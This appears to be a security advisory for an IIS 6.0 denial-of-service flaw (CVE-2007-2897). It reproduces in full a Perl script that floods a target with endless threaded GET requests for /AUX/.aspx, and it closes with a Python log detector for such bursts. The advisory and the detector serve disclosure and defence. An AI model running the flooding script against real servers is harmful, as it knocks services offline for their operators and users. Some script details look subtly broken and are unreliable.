Published: 2007-05-22
Updated: 2012-02-01

Affected systems:
Microsoft IIS

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51527
CVE ID: CVE-2007-2897

Internet Information Services (IIS) is the basic Internet services platform provided by Microsoft for systems running Microsoft Windows.

IIS 6.0 has a denial-of-service vulnerability when a specially crafted path is requested. A remote attacker can exploit it to make the application hang or to disclose sensitive information, and an attacker with physical access to the system can execute arbitrary code with the privileges of the current user.

<*Source: 3APA3A (3APA3A@security.nnov.ru)
Links: http://seclists.org/fulldisclosure/2007/May/378
       http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0419.html
*>

Test method:
--------------------------------------------------------------------------------
Warning: The following program (method) may be offensive in nature and is intended only for security research and teaching. Use at your own risk!

3APA3A (3APA3A@security.nnov.ru) provided the following test method:

#When sending multiple parallel GET requests to an IIS 6.0 server requesting
#/AUX/.aspx the server gets unstable and non-responsive. This happens only
#to servers which respond with a runtime error (System.Web.HttpException)
#and take two or more seconds to respond to the /AUX/.aspx GET request.
#
#
#signed,
#Kingcope kingcope () gmx net
##########################################################################
###***********************************************************************
###
###
###
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### by Kingcope, May/2007
### Better run this from a Linux system
##########################################################################

use IO::Socket;
use threads;

if ($ARGV[0] eq "") { exit; }
my $host = $ARGV[0];

$|=1;

sub sendit {
$sock = IO::Socket::INET->new(PeerAddr => $host,
                              PeerPort => "http(80)",
                              Proto    => "tcp");

print $sock "GET /AUX/.aspx HTTP/1.1
Host: $host
Connection:close
";
}

$sock = IO::Socket::INET->new(PeerAddr => $host,
                              PeerPort => "http(80)",
                              Proto    => "tcp");

print $sock "GET /AUX/.aspx HTTP/1.1
Host: $host
Connection:close
";

$k=0;
while (<$sock>) {
    if (($_ =~ /RuntimesError/) || ($_ =~ /HttpException/)) {
        $k=1;
        last;
    }
}

if ($k==0) {
    print "Server does not seem vulnerable to this attack.
";
    exit;
}

print "ATTACK!
";

while(1){

for (my $i=0;$i<=100;$i++) {
    $thr = threads->new(&sendit);
    print "
$i/100 ";
}

foreach $thr (threads->list) {
    $thr->join;
}
}

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Microsoft
---------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.microsoft.com/technet/security/
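The request pattern described in the test method (many parallel GETs for a path whose segment is the reserved device name AUX) leaves a recognizable trace in IIS logs. The following is an added detection example, not part of the original advisory or of the vendor's tooling: it assumes W3C extended log format with a `#Fields:` header, uses constructed sample lines, and generalizes from AUX to the other reserved DOS device names; the per-second threshold is an arbitrary assumption.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Reserved DOS device names. The advisory names only AUX; the others are a
# generalization added for this example.
DEVICE_SEGMENT = re.compile(r"^(?:CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9])(?:\..*)?$", re.I)

# Constructed sample log (documentation IP ranges), not data from the advisory.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status time-taken
2007-05-22 10:00:01 192.0.2.10 GET /AUX/.aspx 500 2310
2007-05-22 10:00:01 192.0.2.10 GET /AUX/.aspx 500 2450
2007-05-22 10:00:01 192.0.2.10 GET /aux/.aspx 500 2502
2007-05-22 10:00:01 198.51.100.7 GET /default.aspx 200 15
2007-05-22 10:00:02 198.51.100.7 GET /auxiliary/page.aspx 200 20
2007-05-22 10:00:03 198.51.100.7 GET /AUX/.aspx 500 2100
"""

def has_device_segment(uri_stem):
    """True if any path segment is a device name, with or without an extension."""
    return any(DEVICE_SEGMENT.match(s) for s in unquote(uri_stem).split("/") if s)

def parse_w3c(lines):
    """Yield one dict per data line, using the most recent #Fields header."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))

def flag_bursts(lines, threshold=3):
    """Map client IP -> peak device-path GETs in one second, if >= threshold."""
    per_second = Counter()
    for rec in parse_w3c(lines):
        if rec.get("cs-method") == "GET" and has_device_segment(rec.get("cs-uri-stem", "")):
            per_second[(rec.get("c-ip"), rec.get("date"), rec.get("time"))] += 1
    peaks = {}
    for (ip, _date, _time), count in per_second.items():
        peaks[ip] = max(peaks.get(ip, 0), count)
    return {ip: n for ip, n in peaks.items() if n >= threshold}

if __name__ == "__main__":
    print(flag_bursts(SAMPLE_LOG.splitlines()))
```

The same segment test can back a request-filtering rule that rejects such paths before they reach ASP.NET; the log fields used here must be enabled in the site's logging configuration.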